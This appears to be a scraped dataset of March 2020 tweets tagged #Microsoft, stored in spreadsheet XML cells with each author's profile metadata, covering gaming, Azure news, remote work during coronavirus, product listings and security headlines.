    <t>{'id': 38084709, 'id_str': '38084709', 'name': 'Rob Dickson', 'screen_name': 'showmerob', 'location': 'Wichita, KS', 'description': 'CIO of Wichita Public Schools - and father of 3 great girls. 2014 #20toWatch by NSBA - 2016 CDE Top 30 - 2017 ISTE Administrator Award for Exemplary Leadership', 'url': 'https://t.co/XBYocuxzv0', 'entities': {'url': {'urls': [{'url': 'https://t.co/XBYocuxzv0', 'expanded_url': 'http://showmerob.com', 'display_url': 'showmerob.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3914, 'friends_count': 3630, 'listed_count': 361, 'created_at': 'Wed May 06 01:58:06 +0000 2009', 'favourites_count': 12110, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16030, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2A5FAD', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1207488863326916610/zSODRLTw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1207488863326916610/zSODRLTw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/38084709/1545187944', 'profile_link_color': '2B4085',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</si>
  <si>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02:12:36 +0000 2020</t>
  </si>
  <si>
    <t>Some more gaming memories and appreciation 
Catch me on Twitch: Zillla_TheGod
#GodTier #gameboy #nintendo #pokemon #memories #nostalgia #retrogaming #Playstation  #Microsoft #Xbox #SeriesX #Sony #PS5 #Gaming #clip #videogames  #nextgen #abg #zillla #zilllathegod https://t.co/86YGR4fdil</t>
  </si>
  <si>
    <t>{'id': 918966218031292418, 'id_str': '918966218031292418', 'name': 'Zillla', 'screen_name': 'Zillla_TheGod', 'location': '', 'description': 'Gamer, Content Creator for @hyprEvo , #Halo Vet (Day1)\nhttps://t.co/MISK5aF2ob', 'url': 'https://t.co/TDTGpVEuvt', 'entities': {'url': {'urls': [{'url': 'https://t.co/TDTGpVEuvt', 'expanded_url': 'http://zillla.hyprevo.com', 'display_url': 'zillla.hyprevo.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/MISK5aF2ob', 'expanded_url': 'http://zillla.hyprevo.com/', 'display_url': 'zillla.hyprevo.com', 'indices': [55, 78]}]}}, 'protected': False, 'followers_count': 233, 'friends_count': 334, 'listed_count': 2, 'created_at': 'Fri Oct 13 22:26:34 +0000 2017', 'favourites_count': 2306, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2328,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'http://pbs.twimg.com/profile_images/933286758698987520/ZA2KCzZI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/933286758698987520/ZA2KCzZI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/918966218031292418/1511347866',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</si>
  <si>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02:10:31 +0000 2020</t>
  </si>
  <si>
    <t>Your #Microsoft #Excel and #Googlesheet work will be done online, hire today:
Check out my Gig on #Fiverr: create excel spreadsheet with formula https://t.co/yNTgq7Cz8Y</t>
  </si>
  <si>
    <t>{'id': 125573441, 'id_str': '125573441', 'name': 'ILYAS QASIM', 'screen_name': 'moonilyas', 'location': 'KARACHI, PAKISTAN', 'description': 'I am #Blogger,  #Freelancer,  #Excel, #Word, #WordPress #Googlehseet, #PDF, #DataScraping and #Datacleaning Service Provider at #Fiverr.', 'url': 'https://t.co/6Fem8LdRj6', 'entities': {'url': {'urls': [{'url': 'https://t.co/6Fem8LdRj6', 'expanded_url': 'https://www.fiverr.com/moonilyas', 'display_url': 'fiverr.com/moonilyas', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 100, 'friends_count': 191, 'listed_count': 3, 'created_at': 'Tue Mar 23 06:19:06 +0000 2010', 'favourites_count': 195, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 922,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'http://pbs.twimg.com/profile_images/1231479574/powertipsntricks_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231479574/powertipsntricks_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/125573441/1416763039',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</si>
  <si>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02:05:37 +0000 2020</t>
  </si>
  <si>
    <t>Hey all you #Amazon and #Microsoft employees who are on work from home for the rest of the month....pay for some of that endless porn you are now streaming. Tip the creators. Those men and women work hard to cure your boredom. Make their day for making yours</t>
  </si>
  <si>
    <t>{'id': 373390373, 'id_str': '373390373', 'name': 'ðŸ˜±', 'screen_name': 'Foodmancing', 'location': 'Seattle, WA', 'description': 'One time chef, Two-Time elementary school hall monitor. Writing about film and food for @TheDailyMeal USNA Marine Veteran Bi he/him', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 19721, 'friends_count': 948, 'listed_count': 117, 'created_at': 'Wed Sep 14 14:04:31 +0000 2011', 'favourites_count': 33832, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 118559,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'http://pbs.twimg.com/profile_images/1071883634477551616/IoBj87rU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1071883634477551616/IoBj87rU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/373390373/1570946552', 'profile_link_color': '0084B4',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</si>
  <si>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Fri Mar 06 02:04:57 +0000 2020</t>
  </si>
  <si>
    <t>I love this. "As we work to protect public health, we also need to protect the income of hourly workers who support our campus" - Microsoft on the Issues #Microsoft  https://t.co/BHTpXboNKJ</t>
  </si>
  <si>
    <t>{'id': 321733818, 'id_str': '321733818', 'name': 'Callon Campbell ðŸ‡¨ðŸ‡¦ MVP', 'screen_name': 'flying_maverick', 'location': 'Oakville, Canada', 'description': 'Microsoft MVP Azure, Architect, Developer, Consultant, Passionate about Serverless and DevOps, co-creator of #ReflectInsight #Serverless  @Azure @MVPAward', 'url': 'https://t.co/wl5UiwGdTM', 'entities': {'url': {'urls': [{'url': 'https://t.co/wl5UiwGdTM', 'expanded_url': 'https://TheFlyingMaverick.com', 'display_url': 'TheFlyingMaverick.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1096, 'friends_count': 1961, 'listed_count': 230, 'created_at': 'Wed Jun 22 01:46:56 +0000 2011', 'favourites_count': 11727, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13327,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'http://pbs.twimg.com/profile_images/1122923227360133126/sm8MpY_G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1122923227360133126/sm8MpY_G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/321733818/1505315338',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</si>
  <si>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02:03:59 +0000 2020</t>
  </si>
  <si>
    <t>Did you know @BDO_USA is a #Microsoft Preferred Assessor for its SSPA initiative? Learn how our firm helps current and prospective Microsoft vendors meet SSPA program requirements as they initiate or renew contracts: https://t.co/0uLQcQkRgF https://t.co/62CClabFaC</t>
  </si>
  <si>
    <t>{'id': 1973636203, 'id_str': '1973636203', 'name': 'Jason', 'screen_name': 'jlipschultzBDO', 'location': 'Illinois, USA', 'description': 'BDO Managing Director -- Helping companies build trust by improving processes and controls and increasing transparency in the market', 'url': 'https://t.co/cFgt17OGWJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/cFgt17OGWJ', 'expanded_url': 'https://www.bdo.com/services/assurance/service-organization-control-attestation/overview', 'display_url': 'bdo.com/services/assurâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 23, 'listed_count': 0, 'created_at': 'Sun Oct 20 02:58:57 +0000 2013', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 102,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'http://pbs.twimg.com/profile_images/1105940811097821184/gKchlGAE_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1105940811097821184/gKchlGAE_normal.png',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</si>
  <si>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 new coronavirus plan: Seattle-area employees to work from home for next 3 weeks 
#coronavirus  https://t.co/2YcE9Un8e5</t>
  </si>
  <si>
    <t>{'id': 423771048, 'id_str': '423771048', 'name': 'Don Jeter', 'screen_name': 'D0NJETER', 'location': 'Denver, CO', 'description': 'Startups | Cloud Technology | VP of Marketing at @Pax8 | 2019 Inc. 500 #60', 'url': 'https://t.co/S8XybLdtVt', 'entities': {'url': {'urls': [{'url': 'https://t.co/S8XybLdtVt', 'expanded_url': 'http://www.linkedin.com/in/goodmarketing', 'display_url': 'linkedin.com/in/goodmarketiâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 228, 'friends_count': 475, 'listed_count': 10, 'created_at': 'Mon Nov 28 22:37:05 +0000 2011', 'favourites_count': 958, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1157,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'http://pbs.twimg.com/profile_images/1162137295618760706/w5uVaN0s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1162137295618760706/w5uVaN0s_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/423771048/1565910098',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</si>
  <si>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02:02:08 +0000 2020</t>
  </si>
  <si>
    <t>#Security Leftovers: #Microsoft , #Amazon and #Intel Disaster
 https://t.co/qBmOjeMNDc</t>
  </si>
  <si>
    <t>Fri Mar 06 02:00:33 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news https://t.co/bGfAXVDiG4 #Azure #Microsoft #Database</t>
  </si>
  <si>
    <t>{'id': 1176389620264624129, 'id_str': '1176389620264624129', 'name': 'CloudChangelog', 'screen_name': 'CloudChangelog', 'location': 'Seattle, WA', 'description': 'Get daily updates from #Azure #AWS #GoogleCloud #OracleCloud delivered to your inbox. Subscribe @ https://t.co/eiy6iPR9lw', 'url': 'https://t.co/MdmlRc4BjB', 'entities': {'url': {'urls': [{'url': 'https://t.co/MdmlRc4BjB', 'expanded_url': 'https://cloudchangelog.com/', 'display_url': 'cloudchangelog.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/eiy6iPR9lw', 'expanded_url': 'http://cloudchangelog.substack.com', 'display_url': 'cloudchangelog.substack.com', 'indices': [98, 121]}]}}, 'protected': False, 'followers_count': 59, 'friends_count': 96, 'listed_count': 2, 'created_at': 'Tue Sep 24 06:55:24 +0000 2019', 'favourites_count': 14, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 878, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1176754365681430530/nYuFh0Z5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176754365681430530/nYuFh0Z5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1176389620264624129/1569395079',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</si>
  <si>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02:00:03 +0000 2020</t>
  </si>
  <si>
    <t>In #Kenya , if you belong to the have-nots, which is more than 70% of the population, your rights, particularly for #health, are going to be trampled on a lot, @VerahOkeyo #Microsoft #PowerBI #ICFJ https://t.co/JwubEfB3Rp #MSFTAdvocate</t>
  </si>
  <si>
    <t>Fri Mar 06 02:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Here's how we manage privileged identities for on-premises and #Azure at Microsoft.  #AAD #Microsoft #security #MicrosoftSecurity https://t.co/sOmOYL2ao1</t>
  </si>
  <si>
    <t>{'id': 65690251, 'id_str': '65690251', 'name': 'Lukas Velush', 'screen_name': 'luvelush', 'location': 'Seattle, WA', 'description': '#Storyteller on using our own #tech at #Microsoft . Husband &amp; dad trying to do right by the powerful women in my life. Former #journo. Click â†“ to read my blogs.', 'url': 'https://t.co/aeAY8wz4X6', 'entities': {'url': {'urls': [{'url': 'https://t.co/aeAY8wz4X6', 'expanded_url': 'https://www.microsoft.com/itshowcase/blog/author/lukas-velush/', 'display_url': 'microsoft.com/itshowcase/bloâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1929, 'friends_count': 1817, 'listed_count': 25, 'created_at': 'Fri Aug 14 17:43:46 +0000 2009', 'favourites_count': 620, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6145,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'http://pbs.twimg.com/profile_images/882703978097541120/A7Sx-ecF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/882703978097541120/A7Sx-ecF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/65690251/1398721556',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</si>
  <si>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Fri Mar 06 01:57:04 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Surface Book 2 13 5 2-in-1 Laptop Computer Intel Core i5 7300U 256GB ( 68 Bids ) #Microsoft #Surface #Book https://t.co/0YKLT8Er2k  355.0$ Price . 68 Bids Count . End Time: 2020-03-07 14:05:53 PDT</t>
  </si>
  <si>
    <t>{'id': 1194708121333178369, 'id_str': '1194708121333178369', 'name': 'Suimku Ceacpu', 'screen_name': 'ceacpu', 'location': 'New York', 'description': 'Music sports fashion travel social media blogging shppping', 'url': 'https://t.co/pKAYjutyjT', 'entities': {'url': {'urls': [{'url': 'https://t.co/pKAYjutyjT', 'expanded_url': 'https://bestdailydeals.eu/', 'display_url': 'bestdailydeals.eu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 389, 'friends_count': 0, 'listed_count': 3, 'created_at': 'Wed Nov 13 20:06:36 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1833, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1194709789240156160/SanvvkTp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194709789240156160/SanvvkTp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1194708121333178369/1573675989',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</si>
  <si>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01:52:16 +0000 2020</t>
  </si>
  <si>
    <t>MICROSOFT OFFICE PROFESSIONAL PLUS 2019 License Key Fast Delivery 32/64bit #2019 #32/64BIT #Delivery #FAST #License #Microsoft #office #Plus #professional https://t.co/n1RCudC7Bi</t>
  </si>
  <si>
    <t>{'id': 268049239, 'id_str': '268049239', 'name': 'GuruSean', 'screen_name': 'gurusean79', 'location': 'Florida, USA', 'description': 'Get Useful Marketing Essentials ðŸ¤“', 'url': 'https://t.co/aNLYojRp18', 'entities': {'url': {'urls': [{'url': 'https://t.co/aNLYojRp18', 'expanded_url': 'https://getmarketingtutorials.com', 'display_url': 'getmarketingtutorials.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1714, 'friends_count': 2244, 'listed_count': 9, 'created_at': 'Fri Mar 18 01:53:39 +0000 2011', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18697,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'http://pbs.twimg.com/profile_images/1203418552348360704/aeqoibTI_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1203418552348360704/aeqoibTI_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/268049239/1575752315',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</si>
  <si>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01:51:34 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Windows XP Home Edition Service Pack 2 (2002 Upgrade Version) #2002 #Edition #Home #Microsoft #Pack #Service #Upgrade #Version #Windows https://t.co/Nz3lrEwjwe</t>
  </si>
  <si>
    <t>Fri Mar 06 01:51:22 +0000 2020</t>
  </si>
  <si>
    <t>Want to make your presentations more #inclusive with #LiveCaption ? Come join @A2A11y MeetUp #networking event for #Entrepreneurs &amp;amp; #Professionals with #Disabilities. This month we are learning free app/program #Microsoft #PresentationTranslator 
https://t.co/Qk9AMPdHnI #A11y https://t.co/OKGNCtxNok</t>
  </si>
  <si>
    <t>{'id': 869498253599019009, 'id_str': '869498253599019009', 'name': 'Access2Accessibility', 'screen_name': 'A2A11y', 'location': 'Mississauga, Ontario', 'description': 'Building a Canadian Central Resource (Digital and Live Hubs) to find locally all things #Accessible. #A2A11y', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1461, 'friends_count': 3642, 'listed_count': 15, 'created_at': 'Tue May 30 10:18:32 +0000 2017', 'favourites_count': 7980, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3710,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'http://pbs.twimg.com/profile_images/1151891410238525441/8oRnXTul_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151891410238525441/8oRnXTul_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/869498253599019009/1503168384',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</si>
  <si>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01:50:49 +0000 2020</t>
  </si>
  <si>
    <t>This is neat. Hey look I got a badge!! Thanks #Microsoft!! https://t.co/RCGpMdGZCW</t>
  </si>
  <si>
    <t>{'id': 155141673, 'id_str': '155141673', 'name': 'Rocky Pabillore ðŸ§¢ðŸ¦', 'screen_name': 'atRockyP', 'location': 'United States', 'description': 'Computer Nerd, Scripter, Casual Gamer, Cat Lover, Lead System Engineer. Fun Fact: I love Chelsea B. #chelseafc #yanggang #MEM #DefenderATP', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 49, 'friends_count': 445, 'listed_count': 5, 'created_at': 'Sun Jun 13 06:45:24 +0000 2010', 'favourites_count': 989, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4917, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '314107', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/850089362771652608/QIwxEzxK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/850089362771652608/QIwxEzxK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/155141673/1522635142', 'profile_link_color': '442211', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'EFEFEF', 'profile_text_color': '009999', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 01:50:09 +0000 2020</t>
  </si>
  <si>
    <t>A woman is a flower that blossoms in all its glory only in the hands of a caring and attentive man   #Kentucky  #microsoft #portrait https://t.co/eD06qoDyBM</t>
  </si>
  <si>
    <t>{'id': 1235727598837170181, 'id_str': '1235727598837170181', 'name': 'Emily Delcambre', 'screen_name': 'sodewaly', 'location': 'Oxnard, USA', 'description': 'He who wants to do good, knocks at the gate', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 24, 'listed_count': 0, 'created_at': 'Fri Mar 06 00:43:18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'http://pbs.twimg.com/profile_images/1235730030262710272/_hCNylcU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235730030262710272/_hCNylcU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235727598837170181/1583456010',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</si>
  <si>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01:46:47 +0000 2020</t>
  </si>
  <si>
    <t>Hey #mojang #microsoft #Minecraft what if you could feed iron golems refined resources to change their attributes? (Strength, speed, size?) #ideasfrommykid</t>
  </si>
  <si>
    <t>{'id': 968945724263104512, 'id_str': '968945724263104512', 'name': 'TyBCreative', 'screen_name': 'TyCreative', 'location': 'Canada', 'description': 'adding my (less than) 281 cents to the general background noise.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 48, 'listed_count': 0, 'created_at': 'Wed Feb 28 20:27:17 +0000 2018', 'favourites_count': 124,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'http://pbs.twimg.com/profile_images/971866254037438466/iELUZJdB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/971866254037438466/iELUZJdB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/968945724263104512/1558040022',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</si>
  <si>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01:46:13 +0000 2020</t>
  </si>
  <si>
    <t>New county guidance asks tech giants to avoid travel, postpone big events https://t.co/Te4P2GFkfi #Microsoft</t>
  </si>
  <si>
    <t>Fri Mar 06 01:44:02 +0000 2020</t>
  </si>
  <si>
    <t>Doing a #Google import into #Microsoft Ads? Here's what you need to know - Search Engine Land https://t.co/6M0VSNfxiN #Bing #GoogleAds https://t.co/LJxJUt3U43</t>
  </si>
  <si>
    <t>{'id': 7242102, 'id_str': '7242102', 'name': 'SMC | Los Angeles', 'screen_name': 'smcla', 'location': 'Los Angeles, CA', 'description': 'Social Marketing Consultants of Los Angeles #SMM #SMO #SEO #SEM #PPC #GrowthHacking #MarTech #BI #Data #SMC', 'url': 'https://t.co/WYSF9r1duz', 'entities': {'url': {'urls': [{'url': 'https://t.co/WYSF9r1duz', 'expanded_url': 'https://smc.la', 'display_url': 'smc.la', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2181, 'friends_count': 4562, 'listed_count': 1684, 'created_at': 'Wed Jul 04 03:46:08 +0000 2007', 'favourites_count': 1314, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 33522,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'http://pbs.twimg.com/profile_images/910599339025813510/cZwSyigE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/910599339025813510/cZwSyigE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/7242102/1505938679', 'profile_link_color': '2FC2EF',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</si>
  <si>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Fri Mar 06 01:43:55 +0000 2020</t>
  </si>
  <si>
    <t>A team hailing from @MSFTResearch detail a framework that they claim is the first scalable training technique for #3D models from #2D data. #ArtificialIntelligence #MachineLearning @DynamicCIO https://t.co/RF5ADalvol #Microsoft @MicrosoftAI</t>
  </si>
  <si>
    <t>{'id': 13608142, 'id_str': '13608142', 'name': 'rneelmani', 'screen_name': 'rneelmani', 'location': 'New Delhi', 'description': '#Technology #DigitalTransformation #blogger, #CIO #CISO #CyberSecurity #Entrepreneur #Media #Speaker #Moderator', 'url': 'https://t.co/eaVQrj6mvr', 'entities': {'url': {'urls': [{'url': 'https://t.co/eaVQrj6mvr', 'expanded_url': 'http://www.dynamiccio.com', 'display_url': 'dynamiccio.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3246, 'friends_count': 3466, 'listed_count': 749, 'created_at': 'Mon Feb 18 04:07:03 +0000 2008', 'favourites_count': 6000, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 24917,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'http://pbs.twimg.com/profile_images/578120909589872640/Yd-PDskd_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/578120909589872640/Yd-PDskd_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/13608142/1426669622',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</si>
  <si>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01:31:15 +0000 2020</t>
  </si>
  <si>
    <t>Virtual event: Accelerate Your Windows Virtual Desktop Deployment
- https://t.co/eMq2TLXXBw
#Azure #Microsoft #Cloud #Windows #WindowsVirtualDesktop #WVD #VDI https://t.co/rqYj9zUVt9</t>
  </si>
  <si>
    <t>Fri Mar 06 01:27:02 +0000 2020</t>
  </si>
  <si>
    <t>A lot can slow down your team. From separate workflows and inconsistent apps to communication, working together isnt always easy. Here are 4 tools &amp;amp; strategies to improve collaboration: https://t.co/SzkQOdPcQZ #Collaboration #Teamwork #Microsoft https://t.co/SLi5qdJrFP</t>
  </si>
  <si>
    <t>{'id': 55263284, 'id_str': '55263284', 'name': 'CRGroup', 'screen_name': 'crgroup', 'location': 'Worldwide | HQ in Ottawa, ON ', 'description': 'Your Trusted Partner for End-to-End Technology Solutions &amp; Expert Consulting Services #MicrosoftPartner #ERP #CPM #Budgeting #Dynamics #Cloud #BI', 'url': 'https://t.co/mnWDIAIJ8j', 'entities': {'url': {'urls': [{'url': 'https://t.co/mnWDIAIJ8j', 'expanded_url': 'https://crgroup.com', 'display_url': 'crgroup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1295, 'friends_count': 2087, 'listed_count': 127, 'created_at': 'Thu Jul 09 15:15:43 +0000 2009', 'favourites_count': 2379, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5448, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F1F1F1', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/839229545865605120/i3sO9TiM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/839229545865605120/i3sO9TiM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/55263284/1582225392', 'profile_link_color': '0084B4',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</si>
  <si>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01:26:10 +0000 2020</t>
  </si>
  <si>
    <t>Many reasons to love #microsoft! Heres one. Love the culture Satya Nadella created. Empathy in action. Thanks @BradSmi  #satyanadella #msftadvocate #culture #leadership #employeeengagement https://t.co/o6epX1Azyg</t>
  </si>
  <si>
    <t>{'id': 5673712, 'id_str': '5673712', 'name': 'Mahesh Prakriya', 'screen_name': 'maheshp', 'location': 'Bellevue, WA', 'description': 'Group Program Manager', 'url': 'https://t.co/rCMVw0FgiN', 'entities': {'url': {'urls': [{'url': 'https://t.co/rCMVw0FgiN', 'expanded_url': 'https://www.linkedin.com/in/maheshprakriya/', 'display_url': 'linkedin.com/in/maheshprakrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 231, 'friends_count': 167, 'listed_count': 9, 'created_at': 'Tue May 01 03:48:40 +0000 2007', 'favourites_count': 111, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1968,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'http://pbs.twimg.com/profile_images/991072402346983424/4M4XHEpO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/991072402346983424/4M4XHEpO_normal.jpg',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</si>
  <si>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Mar 06 01:23:10 +0000 2020</t>
  </si>
  <si>
    <t>Contest Winners: Secure Everything with Azure Sphere by Hackster, Microsoft, and AVNet
 #Hackster #iot #Microsoft
https://t.co/xVVEUI6aZf</t>
  </si>
  <si>
    <t>{'id': 755421657892737024, 'id_str': '755421657892737024', 'name': 'Build IoT', 'screen_name': 'BuildIoT', 'location': 'All the things!', 'description': 'All about Internet of Things! All the #IoT things!!! from @Build5Nines and @crpietschmann', 'url': 'https://t.co/mRFs52dXDf', 'entities': {'url': {'urls': [{'url': 'https://t.co/mRFs52dXDf', 'expanded_url': 'http://BuildIoTCore.com', 'display_url': 'BuildIoTCore.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 265, 'friends_count': 81, 'listed_count': 58, 'created_at': 'Tue Jul 19 15:18:53 +0000 2016', 'favourites_count': 296, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4022,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'http://pbs.twimg.com/profile_images/1165925134462521344/08pHdPyx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1165925134462521344/08pHdPyx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/755421657892737024/1566813193',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</si>
  <si>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01:17:55 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Shares Tactics Used in Human-Operated #Ransomware Attacks
https://t.co/FRbmi0iX9p https://t.co/rvQuo3GjEa</t>
  </si>
  <si>
    <t>Fri Mar 06 01:16:20 +0000 2020</t>
  </si>
  <si>
    <t>Dont get at each others throats! Friday is almost upon us!
.
 @just_jun64
.
#airassault #anvilstation #halo #haloreach #halocosplay #xbox #xbox360 #xboxonex #microsoft #xboxone #343industries #bungie #cosplay #cosplayersofinstagram #evafoam #foamar... https://t.co/U8SzPJFkJU https://t.co/DZ5UQJ1wRv</t>
  </si>
  <si>
    <t>{'id': 89743948, 'id_str': '89743948', 'name': 'Chris', 'screen_name': 'CrazedOne1988', 'location': 'Denver, CO', 'description': 'Video Editor. Pilot. Gamer. Bronco. Spartan. Brony. Jedi. Power Ranger. GT:CrazedOne1988', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 157, 'friends_count': 116, 'listed_count': 11, 'created_at': 'Fri Nov 13 17:08:25 +0000 2009', 'favourites_count': 59, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4321, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F8F49B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/571184759179464704/weVyeNJe_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/571184759179464704/weVyeNJe_normal.jpeg', 'profile_banner_url': 